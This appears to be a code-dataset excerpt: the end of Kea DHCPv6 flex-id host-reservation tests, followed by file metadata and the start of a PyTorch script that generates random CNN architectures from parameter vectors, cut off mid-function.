'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.enable_db_backend_reservation('MySQL')
srv_control.new_db_backend_reservation('MySQL', 'flex-id', '01:02:03:04:05:06')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'MySQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'MySQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'MySQL', 1)
srv_control.upload_db_reservation('MySQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '11:22:33:44:55:66')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with different duid try to release
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_pgsql():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'flex-id', '01:02:03:04:05:06')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'PostgreSQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'PostgreSQL', 1)
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with different duid try to release
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
| 45.740036
| 108
| 0.68608
| 7,042
| 50,497
| 4.544022
| 0.027833
| 0.09244
| 0.087378
| 0.111628
| 0.988187
| 0.987093
| 0.987093
| 0.985281
| 0.985281
| 0.985281
| 0
| 0.052509
| 0.178209
| 50,497
| 1,103
| 109
| 45.781505
| 0.718589
| 0.02614
| 0
| 0.966916
| 0
| 0
| 0.2146
| 0.043945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018143
| true
| 0.037353
| 0.004269
| 0
| 0.022412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cce943a3c27ae0dfe1e2a98ae0d5e6c9504d27ac
| 162,877
|
py
|
Python
|
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from threading import Thread
import time
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import torch.utils.data as Data
import numpy as np
from multiprocessing import Process
from numpy import *
import torch.multiprocessing as mp
from torch.multiprocessing import Pool, Manager
from queue import Queue
import collections
import random
import requests
import csv
import string
import pandas as pd
import math
import traceback
np.set_printoptions(threshold=500)
class NNgenerator(nn.Module):
def __init__(self,layer_parameters,layer_link,layer_id):
super(NNgenerator,self).__init__()
self.layer_parameters = layer_parameters
self.layer_link = layer_link
self.layer_id = layer_id
self.layer_list = []
self.parameters_flag = 0
self.link_flag = 0
# print(len(self.layer_id))
self.link_graph = self.link_vector_to_graph(self.layer_link,len(self.layer_id))
# print(self.link_graph)
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
# print(in_degree_list)
# print(out_degree_list)
for i in range(0,len(self.layer_id)):
params_length = self.get_params_length(self.layer_id[i])
link_length = self.get_link_length(i)
#print(self.layer_parameters[self.parameters_flag:self.parameters_flag+params_length], self.layer_id[i],i)
self.layer_list.append(self.make_layer(self.layer_parameters[self.parameters_flag:self.parameters_flag+params_length], self.layer_link[self.link_flag:self.link_flag+link_length], self.layer_id[i]))
self.parameters_flag += params_length
self.link_flag += link_length
self.layer_list = nn.ModuleList(self.layer_list)
# print(self.layer_list)
def make_layer(self, parameters, link, id):
'''
生成一个层
'''
# print(parameters,id,len(parameters))
if(id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
return nn.Conv1d(in_channels,out_channels,kernel_size,stride=stride,padding=padding,dilation=dilation,groups=groups)
elif(id == 1):
# print(parameters)
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
return nn.Conv2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width),groups=groups)
elif(id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
return nn.Conv3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width),groups=groups)
elif(id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
return nn.ConvTranspose1d(in_channels,out_channels,kernel_size=kernel_size,stride=stride,padding=padding,output_padding=output_padding,dilation=dilation,groups=groups)
elif(id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
# print(in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups)
return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(id == 6):
#如果是max pooling则需要返回indices
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool1d(kernel_size = kernel_size, stride=stride, padding=padding, dilation=dilation, return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 7):
#如果是max pooling则需要返回indices
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width))
elif(id == 8):
#如果是max pooling则需要返回indices
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width))
elif(id == 9):
kernel_size,stride,padding = parameters[-3:]
return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
return nn.MaxUnpool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),padding=(padding_depth, padding_height, padding_width))
elif(id == 12):
output_size_L,pool_type = parameters[-2:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool1d(output_size_L)
else:
#为avg pooling
return nn.AdaptiveAvgPool1d(output_size_L)
elif(id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool2d((output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool2d((output_size_H,output_size_W))
elif(id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool3d((output_size_D,output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool3d((output_size_D,output_size_H,output_size_W))
elif(id == 15):
num_features = parameters[-1:][0]
return nn.BatchNorm1d(num_features)
elif(id == 16):
num_features = parameters[-1:][0]
return nn.BatchNorm2d(num_features)
elif(id == 17):
num_features = parameters[-1:][0]
return nn.BatchNorm3d(num_features)
elif(id == 18):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 19):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 20):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 21):
input_length,output_length = parameters[1],parameters[3]
return nn.Linear(input_length,output_length)
elif(id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
if(sigmoid == 1):
return nn.Sigmoid()
elif(tanh == 1):
return nn.Tanh()
elif(ReLU == 1):
return nn.ReLU()
else:
return nn.LeakyReLU()
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(id == 23):
return nn.ReLU()
elif(id == 24):
return nn.ReLU()
elif(id == 25):
probability = parameters[-1:][0]
return nn.Dropout2d(p=probability)
elif(id == 26):
probability = parameters[-1:][0]
return nn.Dropout3d(p=probability)
def forward(self,x):
'''
出度为0,输出return
入度为0,表示接收初始输入
入度为1,正常节点,第一个位置表示接收初始输入
入度>1,concat或add节点
实现方法:
① 找到入度为0元素为初始输入
② 广度优先遍历邻接矩阵,将计算结果保存在列表comp_context中
③ 返回出度为0的结果
'''
layer_length = len(self.layer_id)
queue = Queue(layer_length)
comp_context = [0 for index in range(layer_length)]
unpool_indices = [0 for index in range(layer_length)]
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
BFS_flag = np.zeros(layer_length,dtype = int)
#广度遍历
for i in range(0,layer_length):
if(in_degree_list[i] == 0):
queue.put(i)
BFS_flag[i] = 1
while not queue.empty():
layer_index = queue.get()
# print(layer_index)
if(in_degree_list[layer_index] == 0):
'''
该节点入度为0时,只需要接受初始输入
'''
# print('self.layer_list[layer_index]',self.layer_id[layer_index])
# print('first',self.layer_list[layer_index],layer_index)
comp_context[layer_index] = self.layer_list[layer_index](x)
# print('first',comp_context[layer_index].shape)
# print(comp_context)
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(in_degree_list[layer_index] > 0):
'''
该节点入度大于0时,找到所有父节点。
入度为1直接接受父节点输入,入度大于1为concat层和add层
'''
parent_indices = self.get_parent_indices(layer_index)#找到父节点位置
'''
如果父节点没有执行,即comp_context中没有计算结果,则将其重新放入队列尾。
由于广度优先遍历,入度为1时不存在这个问题,入度为2时可能存在
'''
if(len(parent_indices) == 1):
#全连接层需要加入一个展平操作
# print(comp_context[parent_indices[0]].size())
# # print(self.layer_list[layer_index])
# print("父节点",parent_indices[0])
# print("当前节点",layer_index)
#print("父节点",parent_indices[0],comp_context[parent_indices[0]].size())
#print("当前节点",layer_index)
if(self.layer_id[layer_index] == 21):
dimension = len(comp_context[parent_indices[0]].size())
#维度是2,之前有全连接层,已经展平了
if(dimension == 2):
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
else:
# print(comp_context[parent_indices[0]].shape)
comp_context[layer_index] = comp_context[parent_indices[0]].view(comp_context[parent_indices[0]].size(0),-1)
# print(comp_context[layer_index].shape)
comp_context[layer_index] = self.layer_list[layer_index](comp_context[layer_index])
else:
if(self.layer_id[layer_index] == 6 or self.layer_id[layer_index] == 7 or self.layer_id[layer_index] == 8):
#池化层,考虑是否是MaxPool,如果是,加入indices
if(hasattr(self.layer_list[layer_index], 'return_indices')):
comp_context[layer_index],unpool_indices[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('保存',layer_index,'unpool_indices')
else:
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
elif(self.layer_id[layer_index] == 9 or self.layer_id[layer_index] == 10 or self.layer_id[layer_index] == 11):
#反池化层,使用indices
# print(unpool_indices[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]],unpool_indices[parent_indices[0]])
else:
# print('self.layerid',self.layer_id[layer_index],'父节点',parent_indices,'父节点类型',self.layer_id[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('child',comp_context[layer_index])
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(len(parent_indices) > 1):
#检查是否存在comp_context没有计算结果的节点,如果都计算过,则执行else后的语句
for i in range(0,len(parent_indices)):
if(type(comp_context[parent_indices[i]]) != torch.Tensor):
queue.put(layer_index)
break
else:
# print(self.layer_list[layer_index])
#print("父节点",parent_indices)
# for i in range(0,len(parent_indices)):
# print(comp_context[parent_indices[i]].size())
#print("当前节点",layer_index)
#把多个parent输出连接成元组
converge_tuple = ()
for i in range(0,len(parent_indices)):
converge_tuple += (comp_context[parent_indices[i]],)
if(self.layer_id[layer_index] == 23):
#concat层
comp_context[layer_index] = torch.cat(converge_tuple, 1)#channel拼接
elif(self.layer_id[layer_index] == 24):
#add层
comp_context[layer_index] = converge_tuple[0]
for i in range(1,len(parent_indices)):
#print('add层',comp_context[layer_index].size(),converge_tuple[i].size())
comp_context[layer_index] = torch.add(comp_context[layer_index],converge_tuple[i])
#找到该节点的子节点加入队列
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
#找到入度为0的节点return
return_list = []
for i in range(0,layer_length):
if(out_degree_list[i] == 0):
return_list.append(comp_context[i])
return return_list
def get_link_length(self,pos):
'''
获取当前id的连接向量长度
'''
return pos+1
def get_in_degree(self):
'''
根据邻接矩阵,获取节点入度列表
'''
in_degree_list = []
for i in range(0,len(self.layer_id)):
node_row = list(self.link_graph[i])
node_row.pop(i)
in_degree_list.append(np.array(node_row).sum())
return in_degree_list
def get_out_degree(self):
'''
根据邻接矩阵,获取节点出度列表
'''
out_degree_list = []
for i in range(0,len(self.layer_id)):
#除去对角元
node_column = list(self.link_graph[:,i])
node_column.pop(i)
out_degree_list.append(np.array(node_column).sum())
return out_degree_list
def get_parent_indices(self,index):
'''
找到第index个节点的依赖输出节点
'''
node_row = list(self.link_graph[index])
parent_list = []
for i in range(0,len(node_row)):
if(node_row[i] == 1 and i != index):
parent_list.append(i)
return parent_list
def get_children_indices(self,index):
'''
找到第index个节点的子节点(即接收其输入的节点)
'''
node_column = list(self.link_graph[:,index])
children_list = []
for i in range(0,len(node_column)):
if(node_column[i] == 1 and i != index):
children_list.append(i)
return children_list
def link_vector_to_graph(self,link_list,length):
'''
将连接向量转化成邻接矩阵,对角线元素表示是否接收初始输入
'''
graph = np.zeros([length,length],dtype = float)
flag = 0
if len(link_list) != length * length:
for i in range(0,length):
for j in range(0,i+1):
graph[i,j] = link_list[flag]
flag += 1
else:
for i in range(0,length):
for j in range(0,length):
graph[i,j] = link_list[flag]
flag += 1
return graph
def get_params_length(self,layer_id):
'''
获取不同层参数向量长度
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
def validate_NN(vg,dim):
# torch.cuda.empty_cache()
NN = NNgenerator(vg.layer_parameters,vg.layer_link,vg.layer_id)
total_params = sum(p.numel() for p in NN.parameters())
# if total_params > 500000000 or total_params<600000:
# return False
# print(NN)
# NN.cuda()
if dim == 1:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2])
elif dim == 2:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3])
else:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3],vg.net_input[4])
b_x = Variable(x)
output = NN(b_x)
print(f'{total_params:,} total parameters.')
str1 = ''
str1 += ",".join('%s' %i for i in vg.layer_parameters) + " "
str1 += ",".join('%s' %i for i in vg.layer_link) + " "
str1 += ",".join('%s' %i for i in vg.layer_id) + " "
str1 += str(total_params) + " "
str1 += str(vg.dimension) + " "
str1 += str(vg.block_num) + " "
str1 += str(vg.stream_num) + " "
# str1 += cpu_name + " "
# str1 += cpu_MHz + " "
# str1 += cache_size + " "
# str1 += str(processor_num) + " "
# str1 += gpu_name + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
with open("custom_data.txt","a") as file: #只需要将之前的”w"改为“a"即可,代表追加内容
file.write(str1 + "\n")
file.close()
return True
class VectorGenerator():
def __init__(self,dimension,block_num,stream_num,batchNorm_prob=0.5,dropout_prob=0.2,more_fc_prob=0.15,max_fc_num=2,delete_fc_prob=0.1,no_dropout = 0.5,large=1):
'''
dimension:数据维度
block_num:CNN块的数量
stream_num:几路神经网络,只能是1或2
batchNorm_prob:卷积层后加入BatchNorm概率
dropout_prob:卷积层、FC层后加入dropout概率
more_fc_prob:多个FC层的概率
max_fc_num:最大全连接层数量
delete_fc_prob:最后不接FC的概率
流程:
对于每个神经网络流
① 进行block_num次循环生成block_num个神经网络块
② 对于每个神经网络块,为既定的主流CNN的组成块。
'''
super(VectorGenerator, self).__init__()
self.dimension = dimension # 1表示1d,2表示2d,3表示3d
self.block_num = block_num
self.stream_num = stream_num
self.batchNorm_prob = batchNorm_prob
self.dropout_prob = dropout_prob
self.more_fc_prob = more_fc_prob
self.max_fc_num = max_fc_num
self.delete_fc_prob = delete_fc_prob
self.no_dropout = no_dropout
self.large = large
if random.randint(1,100) <= no_dropout * 100:
self.no_dropout = True
else:
self.no_dropout = False
self.layer_num = 0 #记录当前已生成的节点数量
self.layer_parameters = []
self.layer_link = []
self.layer_id = []
self.net_input = self.get_net_input_size()
# print('self.net_input',self.net_input)
# self.make_net()
def get_outshape_recent_size(self,shape):
recent_size = 224
gap = 999
for size in [112,56,28,14,7]:
if abs(shape-size) < gap:
gap = abs(shape-size)
recent_size = size
return recent_size
def make_net(self):
if True:
#生成CNN网络
for net_stream in range(0,1):
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#[224,112,56,28,14,7,1]
#[224,56,28,14,7,1]
#print("netstream",net_stream," 第",block,"个block", '剩余',self.block_num - block - 1)
#一条中的多个block
input_batch_size,input_channels,input_height,input_width = last_block_input_size
out_channels = 1
out_shape = 0
# 生成2 3 4整数倍的out channels
if self.block_num <= 5:
if input_height == 224:
out_shape = self.prob_random([56,112],[0.7,0.3])
else:
out_shape = self.prob_random([int(input_height*0.5),input_height],[0.9,0.1])
recent_size = self.get_outshape_recent_size(out_shape)
if recent_size == 112 and input_channels > 100:
out_shape = int(input_height*0.5)
elif recent_size == 56 and input_channels > 200:
out_shape = int(input_height*0.5)
elif recent_size == 28 and input_channels > 500:
out_shape = int(input_height*0.5)
elif recent_size == 14 and input_channels > 1000:
out_shape = int(input_height*0.5)
if out_shape < 7:
out_shape = input_height
else:
if input_height == 224:
out_shape = self.prob_random([56,112],[0.1,0.9])
else:
remain_block = self.block_num - block - 1
if input_height > 7 * math.pow(2,remain_block):
#print('remain_block')
out_shape = self.prob_random([int(input_height*0.5),input_height],[0.999,0.001])
else:
#print('random')
out_shape = self.prob_random([int(input_height*0.5),input_height],[0.7,0.3])
if out_shape < 7:
out_shape = input_height
recent_size = self.get_outshape_recent_size(out_shape)
if recent_size == 112 and input_channels > 100:
out_shape = int(input_height*0.5)
elif recent_size == 56 and input_channels > 200:
out_shape = int(input_height*0.5)
elif recent_size == 28 and input_channels > 500:
out_shape = int(input_height*0.5)
elif recent_size == 14 and input_channels > 1000:
out_shape = int(input_height*0.5)
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,out_shape,out_shape]
# print('output_size',output_size)
#block = 0 时,接收初始输入,为last_block_index = -1
last_block_index,output_size = self.make_block(last_block_input_size,output_size,last_block_index,4)
last_block_input_size = output_size
fc_length = 0
input_fc_size = last_block_input_size
#加入dropout
if random.randint(0,10) < 5:
params = self.make_layer(19,last_block_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [19] # 加入层id列表中
self.layer_num += 1
#生成全连接层 或者全局池化层
if random.randint(0,10) < 6:
#生成全局池化层
#reshape out_channel = 1000
#加入 #1 conv2d
in_channel = last_block_input_size[1]
out_channel = 1000
conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_block_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_block_input_size)
params = last_block_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 ReLU
length = last_layer_input_size[1]
for i in range(2,len(last_layer_input_size)):
length *= last_layer_input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #3 avgpool
pooling_params = [last_layer_input_size[2],last_layer_input_size[2], 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
